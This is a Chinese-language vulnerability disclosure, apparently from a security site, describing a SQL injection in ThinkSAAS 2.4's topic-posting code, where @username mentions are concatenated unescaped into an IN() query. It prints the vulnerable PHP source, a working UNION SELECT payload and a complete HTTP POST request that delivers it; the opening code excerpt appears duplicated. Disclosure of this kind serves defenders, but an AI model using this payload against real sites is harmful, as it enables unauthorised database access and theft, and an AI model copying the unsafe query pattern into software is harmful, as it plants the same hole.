### 简要描述: ThinkSAAS 2.4 ### 详细说明: app\group\action\add.php 60行开始 ``` // 执行发布帖子 case "do" : ......省略...... $groupid = intval ( $_POST ['groupid'] ); $title = trim( $_POST ['title'] ); $content = tsClean( $_POST ['content'] ); $typeid = intval ( $_POST ['typeid'] ); $tag = $_POST ['tag']; ......省略...... // 处理@用户名 if (preg_match_all ( '/@/', $content, $at )) { preg_match_all ( "/@(.+?)([\s|:]|$)/is", $content, $matches ); $unames = $matches [1]; $ns = "'" . implode ( "','", $unames ) . "'"; $csql = "username IN($ns)"; if ($unames) { $query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" ); foreach ( $query as $v ) { $content = str_replace ( '@' . $v ['username'] . '', '[@' . $v ['username'] . ':' . $v ['userid'] . ']', $content ); $msg_content = '我在帖子中提到了你<br />去看看:' . tsUrl ( 'group', 'topic', array ( 'id' => $topicid ) ); aac ( 'message' )->sendmsg ( $userid, $v ['userid'], $msg_content ); } $new ['group']->update ( 'group_topic', array (...
### 简要描述: ThinkSAAS 2.4 ### 详细说明: app\group\action\add.php 60行开始 ``` // 执行发布帖子 case "do" : ......省略...... $groupid = intval ( $_POST ['groupid'] ); $title = trim( $_POST ['title'] ); $content = tsClean( $_POST ['content'] ); $typeid = intval ( $_POST ['typeid'] ); $tag = $_POST ['tag']; ......省略...... // 处理@用户名 if (preg_match_all ( '/@/', $content, $at )) { preg_match_all ( "/@(.+?)([\s|:]|$)/is", $content, $matches ); $unames = $matches [1]; $ns = "'" . implode ( "','", $unames ) . "'"; $csql = "username IN($ns)"; if ($unames) { $query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" ); foreach ( $query as $v ) { $content = str_replace ( '@' . $v ['username'] . '', '[@' . $v ['username'] . ':' . $v ['userid'] . ']', $content ); $msg_content = '我在帖子中提到了你<br />去看看:' . tsUrl ( 'group', 'topic', array ( 'id' => $topicid ) ); aac ( 'message' )->sendmsg ( $userid, $v ['userid'], $msg_content ); } $new ['group']->update ( 'group_topic', array ( 'topicid' => $topicid ), array ( 'content' => $content ) ); } } ......省略...... ``` tsClean函数 ``` function tsClean($text) { $text = stripslashes(trim($text)); //去除前后空格,并去除反斜杠 //$text = br2nl($text); //将br转换成/n ///////XSS start require_once 'thinksaas/xsshtml.class.php'; $xss = new XssHtml($text); $text = $xss -> getHtml(); //$text = substr ($text, 4);//去除左边<p>标签 //$text = substr ($text, 0,-5);//去除右边</p>标签 ///////XSS end //$text = html_entity_decode($text,ENT_NOQUOTES,"utf-8");//把 HTML 实体转换为字符 //$text = strip_tags($text); //去掉HTML及PHP标记 //$text = cleanJs ( $text ); $text = htmlentities($text, ENT_NOQUOTES, "utf-8"); //把字符转换为 HTML 实体 return $text; } ``` $_POST ['content']在初始化时经过addslashes,进入 tsClean函数stripslashes除去了转义,再除去xss代码,赋给content 变量。 preg_match_all ( "/@(.+?)([\s|:]|$)/is", $content, $matches ); 判断文章内容是否有@某个用户,如果有则提取@的用户名。 $ns = "'" . implode ( "','", $unames ) . "'"; $csql = "username IN($ns)"; 最后进入$csql ,并执行$query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" ); 可以闭合单引号,实现注入。 对查询的结果,进行如下处理。 ``` $query = $db->fetch_all_assoc ( "select userid,username from " . dbprefix . "user_info where $csql" ); foreach ( $query as $v ) { $content = str_replace ( '@' . $v ['username'] . '', '[@' . $v ['username'] . ':' . $v ['userid'] . ']', $content ); $msg_content = '我在帖子中提到了你<br />去看看:' . tsUrl ( 'group', 'topic', array ( 'id' => $topicid ) ); aac ( 'message' )->sendmsg ( $userid, $v ['userid'], $msg_content ); } $new ['group']->update ( 'group_topic', array ( 'topicid' => $topicid ), array ( 'content' => $content ) ); ``` 将原文章内容中 @admin 的形式替换成 [@admin:1111]这种形式。最后在显示时[@admin:1111]会转化为: <a '="" uid="1111" rel="face" href="http://127.0.0.1/thinksaas/index.php?app=user&ac=space&id=1111 ">@admin</a> 显示出注入结果。 前提:系统存在2个账户,例如admin和test。 于是构造payload,把content赋值: <p>aaaa @admin')/**/union/**/select/**/version(),'test'# aaaaaa@test aaaa<br/></p> 会执行select userid,username from user_info where username IN('admin')/**/union/**/select/**/version(),'test'#') payload被替换为: <p>aaaa [@admin:1111]')/**/union/**/select/**/version(),'test'# aaaaaa[@test:注入结果] aaaa<br/></p> http包: ``` POST /thinksaas/index.php?app=group&ac=add&ts=do HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/thinksaas/index.php?app=group&ac=add&id=1 Cookie: c_secure_ssl=bm9wZQ%3D%3D; c_secure_uid=MQ%3D%3D; c_secure_pass=d2f4d9c199d480bde1c7527ab5f00f67; c_secure_tracker_ssl=bm9wZQ%3D%3D; c_secure_login=bm9wZQ%3D%3D; PHPSESSID=v56iku742gj03lrpu8dhmhqrn6; ts_autologin=6wgf4rovqk4c8ckso04wswosg0owwc0; ts_email=admin%40admin.com Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------16131784015115 Content-Length: 788 -----------------------------16131784015115 Content-Disposition: form-data; name="title" sql -----------------------------16131784015115 Content-Disposition: form-data; name="content" <p>aaaa @admin')/**/union/**/select/**/version(),'test'# aaaaaa@test aaaa<br/></p> -----------------------------16131784015115 Content-Disposition: form-data; name="tag" -----------------------------16131784015115 Content-Disposition: form-data; name="iscomment" 0 -----------------------------16131784015115 Content-Disposition: form-data; name="iscommentshow" 0 -----------------------------16131784015115 Content-Disposition: form-data; name="groupid" 1 -----------------------------16131784015115 Content-Disposition: form-data; name="token" 79e185a1215f76ec26e0aa120ec8240f0eb3aa1a -----------------------------16131784015115-- ``` [<img src="https://images.seebug.org/upload/201505/011742448453f380c04fa03f460e4753afc5aa23.jpg" alt="QQ截图20150501174213.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/011742448453f380c04fa03f460e4753afc5aa23.jpg) ### 漏洞证明: 官网有云waf,只做了本地复现
